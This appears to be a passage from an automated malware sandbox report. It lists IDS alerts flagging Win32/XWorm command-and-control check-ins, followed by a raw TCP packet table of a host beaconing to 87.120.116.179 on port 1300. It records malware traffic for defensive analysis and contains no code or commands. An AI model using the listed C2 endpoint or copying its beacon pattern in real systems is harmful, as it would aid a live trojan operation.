                            2025-01-08T16:04:02.018831+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:04:02.119378+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:04:02.121338+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:04:12.201753+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:04:12.204105+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:04:16.264450+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:04:16.264450+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:04:16.870901+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:04:16.881663+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:04:17.371295+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:04:17.389756+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:04:18.689405+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:04:18.696855+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:04:22.603185+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:04:22.613852+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:04:22.707431+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:04:22.718825+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:04:22.812462+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:04:22.820238+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:04:22.914038+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:04:22.921977+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:04:25.762894+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:04:25.764835+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:04:37.416768+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:04:37.430720+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:04:38.583436+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:04:38.585572+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:04:40.068279+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:04:40.070225+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:04:46.615189+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:04:46.615189+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:04:48.636507+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:04:48.639685+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:04:48.735921+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:04:48.744672+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:04:50.307584+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:04:50.309402+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:04:53.838493+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:04:53.841621+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:04:53.935124+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:04:53.941337+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:04:54.010342+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:04:54.104400+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:04:54.106204+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:04:54.201684+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:04:54.207001+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:04:54.295618+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:04:54.299413+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:05:00.072731+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:05:00.073653+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Jan 8, 2025 16:01:01.042848110 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:01:01.047734022 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:01:01.047868013 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:01:01.362397909 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:01:01.367243052 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:01:11.764056921 CET5464753192.168.2.91.1.1.1
                            Jan 8, 2025 16:01:11.768903971 CET53546471.1.1.1192.168.2.9
                            Jan 8, 2025 16:01:11.768960953 CET5464753192.168.2.91.1.1.1
                            Jan 8, 2025 16:01:11.773838997 CET53546471.1.1.1192.168.2.9
                            Jan 8, 2025 16:01:12.229613066 CET5464753192.168.2.91.1.1.1
                            Jan 8, 2025 16:01:12.234654903 CET53546471.1.1.1192.168.2.9
                            Jan 8, 2025 16:01:12.234718084 CET5464753192.168.2.91.1.1.1
                            Jan 8, 2025 16:01:12.903932095 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:01:12.908720970 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:01:13.077800989 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:01:13.127851009 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:01:13.132671118 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:01:16.242604017 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:01:16.288450003 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:01:24.445365906 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:01:24.450229883 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:01:24.618804932 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:01:24.620769978 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:01:24.625576019 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:01:35.991791964 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:01:35.996840954 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:01:36.166776896 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:01:36.170006990 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:01:36.174969912 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:01:46.243778944 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:01:46.288362026 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:01:47.538767099 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:01:47.543596983 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:01:47.713242054 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:01:47.714831114 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:01:47.719685078 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:01:59.069865942 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:01:59.074745893 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:01:59.244040012 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:01:59.246665955 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:01:59.251744032 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:02:09.602603912 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:02:09.607371092 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:02:09.782193899 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:02:09.784370899 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:02:09.789140940 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:02:10.179303885 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:02:10.184289932 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:02:10.353230953 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:02:10.362629890 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:02:10.367495060 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:02:13.195081949 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:02:13.199969053 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:02:13.370500088 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:02:13.374062061 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:02:13.378915071 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:02:15.292403936 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:02:15.297347069 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:02:15.489398956 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:02:15.497762918 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:02:15.502652884 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:02:16.258224964 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:02:16.304028034 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:02:16.835947037 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:02:16.840920925 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:02:17.034068108 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:02:17.035854101 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:02:17.040674925 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:02:28.382493019 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:02:28.387362003 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:02:28.556337118 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:02:28.557878971 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:02:28.562659025 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:02:34.413880110 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:02:34.418831110 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:02:34.587963104 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:02:34.590605974 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:02:34.595738888 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:02:36.080432892 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:02:36.085366011 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:02:36.254498005 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:02:36.258426905 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:02:36.263319016 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:02:42.288702965 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:02:42.293551922 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:02:42.464648962 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:02:42.466617107 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:02:42.471446037 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:02:44.601273060 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:02:44.606112957 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:02:44.616879940 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:02:44.621673107 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:02:44.663817883 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:02:44.668711901 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:02:44.695091963 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:02:44.699887037 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:02:44.860549927 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:02:44.862386942 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:02:44.867201090 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:02:44.908106089 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:02:44.909885883 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:02:44.955559969 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:02:44.955791950 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:02:44.957595110 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:02:44.962335110 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:02:45.050925970 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:02:45.052850962 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:02:45.057598114 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:02:45.179826021 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:02:45.184638977 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:02:45.375711918 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:02:45.382678032 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:02:45.387525082 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:02:46.232947111 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:02:46.290880919 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:02:53.663717031 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:02:53.668664932 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:02:54.884571075 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:02:54.888266087 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:02:54.893151999 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:03:03.023283005 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:03:03.028119087 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:03:03.054666996 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:03:03.059546947 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:03:03.197868109 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:03:03.199865103 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:03:03.204675913 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:03:03.293292046 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:03:03.295087099 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:03:03.300000906 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:03:13.210721016 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:03:13.215696096 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:03:13.388453007 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:03:13.395073891 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:03:13.399909973 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:03:15.667649031 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:03:15.672600985 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:03:15.841576099 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:03:15.845022917 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:03:15.849805117 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:03:16.234270096 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:03:16.295238972 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:03:18.507749081 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:03:18.512650967 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:03:18.732295990 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:03:18.750360012 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:03:18.755283117 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:03:30.040585995 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:03:30.045521975 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:03:30.215641022 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:03:30.260557890 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:03:30.297465086 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:03:30.302325964 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:03:31.070091963 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:03:31.074985981 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:03:31.085886955 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:03:31.090672016 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:03:31.117001057 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:03:31.121824026 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:03:31.132571936 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:03:31.138185978 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:03:31.244626999 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:03:31.246525049 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:03:31.251287937 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:03:31.333076000 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:03:31.334682941 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:03:31.339468002 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:03:31.438905001 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:03:31.441862106 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:03:31.446629047 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:03:31.446747065 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:03:31.451505899 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:03:42.679574966 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:03:42.684519053 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:03:42.863753080 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:03:42.865669966 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:03:42.870491982 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:03:43.710777998 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:03:43.715778112 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:03:43.908474922 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:03:43.910629988 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:03:43.915446043 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:03:46.241774082 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:03:46.289113045 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:03:51.507738113 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:03:51.512636900 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:03:51.523344040 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:03:51.528424978 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:03:51.681588888 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:03:51.683612108 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:03:51.688714981 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:03:51.770205975 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:03:51.771931887 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:03:51.776731014 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:01.835839033 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:01.840734959 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:01.945261955 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:01.950170994 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:02.015912056 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:02.018831015 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:02.023642063 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:02.119378090 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:02.121337891 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:02.126205921 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:12.007824898 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:12.013093948 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:12.201752901 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:12.204104900 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:12.208937883 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:16.264450073 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:16.320012093 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:16.696623087 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:16.701569080 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:16.870901108 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:16.881663084 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:16.886512995 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:17.196518898 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:17.201476097 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:17.371294975 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:17.389755964 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:17.394665003 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:18.508152962 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:18.513098955 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:18.689404964 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:18.696855068 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:18.703135014 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:22.398538113 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:22.403439999 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:22.445456028 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:22.450447083 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:22.492145061 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:22.497059107 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:22.523439884 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:22.528337955 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:22.603184938 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:22.613852024 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:22.618801117 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:22.707431078 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:22.718825102 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:22.723745108 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:22.812462091 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:22.820238113 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:22.825344086 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:22.914037943 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:22.921977043 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:22.926817894 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:25.554632902 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:25.559587002 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:25.762893915 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:25.764834881 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:25.769692898 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:37.102691889 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:37.107578039 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:37.416768074 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:37.430720091 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:37.435611963 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:38.399048090 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:38.407035112 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:38.583436012 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:38.585572004 CET497571300192.168.2.987.120.116.179
